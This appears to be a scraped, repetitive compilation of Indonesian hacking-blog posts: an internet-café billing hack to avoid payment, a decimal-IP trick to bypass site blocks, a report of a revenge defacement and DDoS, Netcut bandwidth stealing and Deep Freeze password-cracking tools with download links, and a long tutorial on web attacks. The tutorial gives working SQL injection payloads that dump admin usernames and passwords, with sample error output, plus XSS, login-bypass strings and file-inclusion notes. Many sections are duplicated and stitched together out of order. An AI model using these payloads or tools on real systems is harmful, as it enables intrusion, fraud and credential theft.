4. Catat IP Address adminnya tu…
5. Jalankan program billhack.zip
6. Pilih single client atau all client, single client untuk menggratiskan kompueter tertentu saja, all client untuk menggartiskan semua komputer, saya saranin pake yang single client aja, biar dosanya gak gede-gede amat…
7. Ketik IP Address admin tadi, pake port 1500, trus tekan hack now
8. Taraaaaaaaaaaaa, di biling server nickname kita sudah tidak ada.
9. Tanyain ke OP kalo mau bayar ato mau buktiin kalo emang hacking-nya sukses, kalo gak mau bayar yaudah lewati aja
Catatan : Pada billing di komputer kita billing tetap berjalan, tetapi di server sudah tidak ada,(tidak ada bukan NOL(0)). Hal ini juga bisa membantu kita jika kita ingin jujur, kta tinggal bayar sesui yang tertera pada billing kita.
Jika anda yang membaca ini adalah OP warnet, segera lakukan pencegahan!
Menembus Proksi
Menembus proxy server dengan IP Desimal (cm5)
Oleh CyberMuttaqin
Published: Juni 1, 2009
Updated: Juni 4, 2009
Print
Ini adalah trik yang ke 5 dari saya masih dengan tema yang sama untuk menerobos block situs dari ISP maupun warnet, atau kantor anda...
namun dengan trick yang beda...
ini POCnya...
1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt
2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...
Code: Select all
ping www.youtube.com
maka kita dapat melihat ip addressnya yaitu :
kita mendapatkan ip addressnya yaitu :
Code: Select all
208.177.236.70
3. masukkan alamat ini ke
Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :
kita lihat hasilnya ...
Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126
4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya :
bang...
tu situs udah nongol...
5. Ini adalah trick yang bisa anda gunakan selain 4 trick yang lalu...
6. Tunggu post saya selanjutnya masih dengan tema yang sama namun trik yang bedha!
7. Banyak jalan menuju ke Mecca (Doain ane naik haji yee..! ha... ha..)
8. Kritik dan saran slalu saya tunggu dari jasakomers semua...
Wassalamualaikum
Oleh CyberMuttaqin
Published: Juni 1, 2009
Updated: Juni 4, 2009
Ini adalah trik yang ke 5 dari saya masih dengan tema yang sama untuk menerobos block situs dari ISP maupun warnet, atau kantor anda...
namun dengan trick yang beda...
ini POCnya...
1. Buka cmd
Start >> All Programs >> Accesories >> Command Prompt
2. ketik ping site yang terblock untuk kita lihat ip addressnya...
disini saya mencontohkan http://www.youtube.com
karena ada beberapa isp yang memblog situs ini...
Code: Select all
ping www.youtube.com
maka kita dapat melihat ip addressnya yaitu :
kita mendapatkan ip addressnya yaitu :
Code: Select all
208.177.236.70
3. masukkan alamat ini ke
Code: Select all
http://www.allredroster.com/iptodec.htm
untuk kita jadikan desimal :
kita lihat hasilnya ...
Code: Select all
Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126
4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!
dan hasilnya :
bang...
tu situs udah nongol...
5. Ini adalah trick yang bisa anda gunakan selain 4 trick yang lalu...
6. Tunggu post saya selanjutnya masih dengan tema yang sama namun trik yang bedha!
7. Banyak jalan menuju ke Mecca (Doain ane naik haji yee..! ha... ha..)
8. Kritik dan saran slalu saya tunggu dari jasakomers semua...
Wassalamualaikum
Hacker Indonesia Menuntut Balas, Situs Hacker Malaysia di Deface
Pertarungan antara hacker malaysia dan hacker indonesia kini tampaknya terjadi secara langsung dimana antar kelompok hacker kini saling menyerang. Kali ini, komunitas hacker malaysia, tbd.my yang telah melakukan penyerangan ke komunitas hacker indonesia berhasil dilumpuhkan.
Setelah melakukan serangan ke situs komunitas hacker indonesia, tampaknya komunitas underground indonesia mulai bersatu dan menuntut balas secara bersama-sama. Serangan ddos balasan dilakukan dan terakhir, situs tdb.my yang telah mendeface situs jasakom beserta situs-situs lainnya berhasil di deface oleh yogyacarderlink.

We are exist, and we are revenge for Indonesian Hacker's name
Menurut informasi yang ada, database beserta file-file yang ada didalamnya juga telah dihapus secara total. Kali ini, giliran situs hacker malaysia yang harus mengambil file dan database backup untuk bisa diaktifkan kembali.
Setelah melakukan serangan ke situs komunitas hacker indonesia, tampaknya komunitas underground indonesia mulai bersatu dan menuntut balas secara bersama-sama. Serangan ddos balasan dilakukan dan terakhir, situs tdb.my yang telah mendeface situs jasakom beserta situs-situs lainnya berhasil di deface oleh yogyacarderlink.

We are exist, and we are revenge for Indonesian Hacker's name
Menurut informasi yang ada, database beserta file-file yang ada didalamnya juga telah dihapus secara total. Kali ini, giliran situs hacker malaysia yang harus mengambil file dan database backup untuk bisa diaktifkan kembali.
Netcut, pemotong koneksi clien hotspot dan penangkalnya
Pernahkah anda merasa koneksi di wifi-hotspot anda lemot bahkan tidak jalan samasekali? Jangan buru-buru berkesimpulan koneksi ke ISP yang bermasalah, karena bisa jadi ada user nakal bin jahil yang berlaku curang menggunakan aplikasi pemutus koneksi dari client ke server.
Adalah Netcut, sebuah aplikasi yang seperti namanya yang memotong akses internet pada public/private WIFI hotspot, ataukah sebuah PC LAN workgroup dari client ke server atau sebaliknya. Program ini pada umumnya dipergunakan oleh pengguna jaringan yang ingin mengambil quota (jatah) bandwith untuk dipakai sendiri tanpa mau dishare kepada client yang lain.
Pencurian bandwith dengan memutuskan koneksi secara teoritis sangat manjur untuk meningkatkan kecepatan akses internet, misalnya sebuah jaringan mendapat jarah 100 Kb/s dan akan dibagi kepada 10 client maka masing-masing client akan memperoleh 10 Kb/s. Dengan Netcut, maka kita bisa memutuskan koneksi 9 client yang lain dan jatah 100 Kb/s akan menjadi milik kita.
Kejam bukan?….
Tidak heran, bila dibeberapa public WIFI hotspot yang pernah saya kunjungi sering saya dapati banyak yang mengeluh tidak bisa conect internet, atau lebih ekstrim lagi user yang perang netcut yang menyebabkan tidak ada satu pun user yang bisa online. Atau seperti pengalaman rekan blogger lain yang hampir terlibat kontak fisik gara-gara netcut sialan :mrgreen:
Penggunaan netcut cukup simpel, cukup memilih IP/Hostname/Mac Address client yang ingin diputuskan koneksinya dan mengklik cut off. User tersebut akan terputus koneksinya dari server sampai kita membebaskannya dari netcut dengan mengklik Resume atau mengganti IP address nya.
Program Netcut itu sendiri bisa didownload Disini:
http://www.ziddu.com/download/4892331/NetcutDV21.0.rar.html
Tips menangkal serangan Netcut:
* Jangan Pernah menggunakan Netcut. Sekali orang dirugikan akibat perbuatan anda, maka akan ada dendam. Peace gan!
* Rubah IP address anda apabila merasa dijahili dengan Netcut.
* Gunakan Anti Netcut (tetapi netcut selalu lebih maju dari anti netcut, anti net cut bisa di download langsung DISINI:
http://www.tools4free.net/files/anti%20netcut%202.exe
* Hidden komputer dari LAN pake XP antispy
* Install anti ARP (trial)
* Rubah MAC Address
Adalah Netcut, sebuah aplikasi yang seperti namanya yang memotong akses internet pada public/private WIFI hotspot, ataukah sebuah PC LAN workgroup dari client ke server atau sebaliknya. Program ini pada umumnya dipergunakan oleh pengguna jaringan yang ingin mengambil quota (jatah) bandwith untuk dipakai sendiri tanpa mau dishare kepada client yang lain.
Pencurian bandwith dengan memutuskan koneksi secara teoritis sangat manjur untuk meningkatkan kecepatan akses internet, misalnya sebuah jaringan mendapat jarah 100 Kb/s dan akan dibagi kepada 10 client maka masing-masing client akan memperoleh 10 Kb/s. Dengan Netcut, maka kita bisa memutuskan koneksi 9 client yang lain dan jatah 100 Kb/s akan menjadi milik kita.
Kejam bukan?….
Tidak heran, bila dibeberapa public WIFI hotspot yang pernah saya kunjungi sering saya dapati banyak yang mengeluh tidak bisa conect internet, atau lebih ekstrim lagi user yang perang netcut yang menyebabkan tidak ada satu pun user yang bisa online. Atau seperti pengalaman rekan blogger lain yang hampir terlibat kontak fisik gara-gara netcut sialan :mrgreen:
Penggunaan netcut cukup simpel, cukup memilih IP/Hostname/Mac Address client yang ingin diputuskan koneksinya dan mengklik cut off. User tersebut akan terputus koneksinya dari server sampai kita membebaskannya dari netcut dengan mengklik Resume atau mengganti IP address nya.
Program Netcut itu sendiri bisa didownload Disini:
http://www.ziddu.com/download/4892331/NetcutDV21.0.rar.html
Tips menangkal serangan Netcut:
* Jangan Pernah menggunakan Netcut. Sekali orang dirugikan akibat perbuatan anda, maka akan ada dendam. Peace gan!
* Rubah IP address anda apabila merasa dijahili dengan Netcut.
* Gunakan Anti Netcut (tetapi netcut selalu lebih maju dari anti netcut, anti net cut bisa di download langsung DISINI:
http://www.tools4free.net/files/anti%20netcut%202.exe
* Hidden komputer dari LAN pake XP antispy
* Install anti ARP (trial)
* Rubah MAC Address
Cara Mudah Menjebol Password Deep Freeze 6
sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk
Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.
Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.
Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh
TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.
Tampilannya seperti ini :

Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .
Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password
TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.

Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.
Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.
Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.
Download dua tools tersebut di sini
http://www.ziddu.com/download/6798049/DeepfreezeManisx.zip.html
Gunakanlah alat bantu ini dengan bijaksana.
Bukan cuma admin, user warnet juga sebaiknya berhati-hati karena aneka script, virus, keylogger, program aneh-aneh bisa dimasukkan oleh siapa saja di warnet-warnet. Alamax daku sendiri bisa ikutan pusing
kalo main di warnet.
SALAM
Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.
Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.
Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh
TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.
Tampilannya seperti ini :
Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .
Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password
TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.
Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.
Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.
Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.
Download dua tools tersebut di sini
http://www.ziddu.com/download/6798049/DeepfreezeManisx.zip.html
Gunakanlah alat bantu ini dengan bijaksana.
Bukan cuma admin, user warnet juga sebaiknya berhati-hati karena aneka script, virus, keylogger, program aneh-aneh bisa dimasukkan oleh siapa saja di warnet-warnet. Alamax daku sendiri bisa ikutan pusing
kalo main di warnet.
SALAM
simple basic common web attack
halo kawan-kawan semuanya, ini sebenernya gue pesembahkan buat devilzc0de yang sedang mengalami guncangan dari pihak asink(cie,cie bahasanya), maksudnya ini gue tulis ketika devilzc0de sedang mengalami suspend diforumnya, semoga ini cepat berlalu dan Devilzc0de cepet exist kembali, terima kasih buat temen2 yang udeh mau bantu berdirinya Devilzc0de sampe saat ini, w cinta loh semuanya, kita adalah familly.
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat...
oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.
dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:
1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)
ok langsung saja kita menuju TKP juragan
0x01::XSS (cross site scripting)
nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih , gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...
XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja
example:
http://namasite.com/aduh.php?xss=welcome+to+mysite
nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:
example:
http://namasite.com/aduh.php?xss=alert(kamu ganteng deh)
nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe
0x02::SQL injection
nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,, ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).
gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,
example:
http://serang.org.sql.php?inject=20'
nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection
kemudian kita bisa mencari kolom keberapa yang mengalami masalah
example:
http://serang.org/sql.php?injection=10 order by 1--
example:
http://serang.org/sql.php?injection=10 order by 5--
atau juga bisa mencari dengan metode lain:
example:
http://serang.org/sql.php?injection=-10 union all select 1--
example:
http://serang.org/sql.php?injection=-10 union all select 1,2--
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,3--
dan seterusnya
atau juga bisa
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1--
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--
dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3
setelah itu kita bisa mengecek versi sqlnya
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--
atau
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--
kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.
untuk mencari tabel yang terdapat dalam site tersebut
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--
inget file yang penting adalah:
>>group_concat(table_name)<< == untuk mencari table dari database yang ada.
>>from information_schema.tables where table_schema=database << == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)
ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling
nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII
setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email
nah kan udeh tahu kan, dumping deh
example:
http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--
nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.
0x03::SQL injection for ASP
sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..
example:
http://inject.web.id/sql.asp?injection=12'
kalo muncul pesan error kaya gini "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p
lanjutkan dengan
example:
http://inject.web.id/sql.asp?injection=12' HAVING 1=1--
error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."
cari lagi table dan kolomnya
example:
http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--
error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."
Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.
Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--
Pesan error yang muncul:
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9
Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.
Untuk mencari nama databasenya
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9
Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"
Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9
Error menunjukkan bahwa user adalah "sa"
Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- >>contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9
Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--
/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9
Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--
Error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9
Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.
Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
Menampilkan error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--
Menghasilkan error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--
Muncul error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9
Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
Itu menandakan bahwa sudah tidak ada lagi column yang lain.
Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--
Error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:
example:
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
Jika error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9
Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
Dan jika errornya:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10
Berarti hanya ada 2 user yaitu "admin" dan "cwh".
Dan untuk mencari passwordnya, perintahnya seperti:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--
Dan jika error yang ditampilkan adalah:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9
Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"
0x04::bypass Login
emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..:p...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...
ini sedikit list yang biasa di gunakan untuk bypass halaman website:
'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe
0x05::File Inclusion
hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion
nah sini w bahas yang RFI dulu yah..
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...
nah kemudian LFI
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
nah disni saya akan memberikan bug terjadinya RFI dan LFI..
> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>
0x06::RCE (Remote Command Execution)
RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site
sebagai contoh saya bisa kasih link saja yah tentang RCE ini
untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369
untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260
nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..
sekian dari saya semoga bermanfaat adanya bro...
greetz:mywisdom,gunslinger_,flyff666,petimati, gonzhack,rotlez,xtronic,spykit33,devil_nongkrong,7460(newbie_mantap),d4y4x ( thanks udeh mau dengerin curhatan w bro) n all Devilzc0de member n crew, yogyacarderlink n all member, hacker newbie n all member n all underground community
referensi:google, baca ebook, tanya2 sama temen, otak gue yang kadang gilanya kumat..
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat...
oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.
dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:
1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)
ok langsung saja kita menuju TKP juragan
0x01::XSS (cross site scripting)
